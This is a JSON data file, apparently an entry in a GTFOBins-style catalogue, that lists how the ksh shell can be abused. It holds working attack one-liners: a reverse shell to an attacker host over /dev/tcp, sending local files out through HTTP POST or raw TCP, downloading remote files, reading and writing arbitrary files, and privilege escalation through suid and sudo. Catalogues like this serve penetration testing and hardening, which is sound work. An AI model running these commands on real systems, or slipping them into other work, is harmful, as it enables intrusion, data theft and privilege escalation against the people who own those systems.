{
  "functions": {
    "shell": [
      {
        "code": "ksh"
      }
    ],
    "reverse-shell": [
      {
        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
        "code": "ksh -c 'ksh -i > /dev/tcp/[host]/[port] 2>&1 0>&1'\n"
      }
    ],
    "file-upload": [
      {
        "description": "Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
        "code": "ksh -c 'echo -e \"POST / HTTP/0.9\\n\\n$(cat [file])\" > /dev/tcp/[host]/[port]'\n"
      },
      {
        "description": "Send local file using a TCP connection. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
        "code": "ksh -c 'cat [file] > /dev/tcp/[host]/[port]'\n"
      }
    ],
    "file-download": [
      {
        "description": "Fetch a remote file via HTTP GET request.",
        "code": "ksh -c '{ echo -ne \"GET /[file] HTTP/1.0\\r\\nhost: [host]\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n    3<>/dev/tcp/[host]/[port] \\\n    | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } > [file]'\n"
      },
      {
        "description": "Fetch remote file using a TCP connection. Run 'nc -l -p [port] < [file]' on the attacker box to send the file.",
        "code": "ksh -c 'cat < /dev/tcp/[host]/[port] > [file]'\n"
      }
    ],
    "file-write": [
      {
        "code": "ksh -c 'echo DATA > [file]'\n"
      }
    ],
    "file-read": [
      {
        "description": "It trims trailing newlines.",
        "code": "ksh -c 'echo \"$(<[file])\"'\n"
      },
      {
        "description": "It trims trailing newlines.",
        "code": "ksh -c $'read -r -d \\x04 < [file]; echo \"$REPLY\"'\n"
      }
    ],
    "suid": [
      {
        "code": "./ksh -p"
      }
    ],
    "sudo": [
      {
        "code": "sudo ksh"
      }
    ]
  }
}